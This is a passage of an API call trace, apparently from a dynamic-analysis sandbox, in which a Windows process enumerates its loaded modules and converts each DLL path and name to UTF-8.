	[0102.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.711] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.712] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHELL32.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.713] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.714] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eappcfg.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.715] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\odbctrac.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\odbctrac.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="odbctrac.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="odbctrac.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.716] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ATL.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ATL.DLL", lpUsedDefaultChar=0x0) returned 28
	[0102.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATL.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATL.DLL", lpUsedDefaultChar=0x0) returned 8
	[0102.717] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NTDSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NTDSAPI.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTDSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTDSAPI.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.718] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WS2_32.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.719] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ODBC32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ODBC32.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ODBC32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ODBC32.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.720] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DPAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DPAPI.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DPAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DPAPI.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.721] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", lpUsedDefaultChar=0x0) returned 40
	[0102.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows.storage.dll", lpUsedDefaultChar=0x0) returned 20
	[0102.722] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.723] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shlwapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.724] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 39
	[0102.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 19
	[0102.725] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shcore.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shcore.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.726] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\powrprof.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powrprof.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.727] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\profapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.728] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ole32.dll", lpUsedDefaultChar=0x0) returned 30
	[0102.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ole32.dll", lpUsedDefaultChar=0x0) returned 10
	[0102.730] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.731] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ACTIVEDS.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ACTIVEDS.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVEDS.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVEDS.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.760] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsuiext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsuiext.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsuiext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsuiext.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.761] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\netutils.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\netutils.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netutils.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netutils.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.762] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\logoncli.dll", lpUsedDefaultChar=0x0) returned 33
	[0102.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logoncli.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.764] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 33
	[0102.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 13
	[0102.765] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DSROLE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DSROLE.dll", lpUsedDefaultChar=0x0) returned 31
	[0102.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DSROLE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DSROLE.dll", lpUsedDefaultChar=0x0) returned 11
	[0102.766] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\adsldpc.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\adsldpc.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adsldpc.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adsldpc.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.767] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WLDAP32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WLDAP32.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WLDAP32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WLDAP32.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.769] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\COMCTL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\COMCTL32.dll", lpUsedDefaultChar=0x0) returned 121
	[0102.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMCTL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMCTL32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.770] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MPR.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MPR.dll", lpUsedDefaultChar=0x0) returned 28
	[0102.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPR.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPR.dll", lpUsedDefaultChar=0x0) returned 8
	[0102.771] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0102.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0102.772] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll", lpUsedDefaultChar=0x0) returned 120
	[0102.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="comctl32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="comctl32.dll", lpUsedDefaultChar=0x0) returned 13
	[0102.774] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WININET.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WININET.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WININET.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WININET.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.775] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\PSAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\PSAPI.DLL", lpUsedDefaultChar=0x0) returned 30
	[0102.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSAPI.DLL", lpUsedDefaultChar=0x0) returned 10
	[0102.776] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
	[0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USERENV.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USERENV.dll", lpUsedDefaultChar=0x0) returned 32
	[0102.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USERENV.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERENV.dll", lpUsedDefaultChar=0x0) returned 12
	[0102.779] Module32NextW (hSnapshot=0x7fc, lpme=0x20af280) returned 1
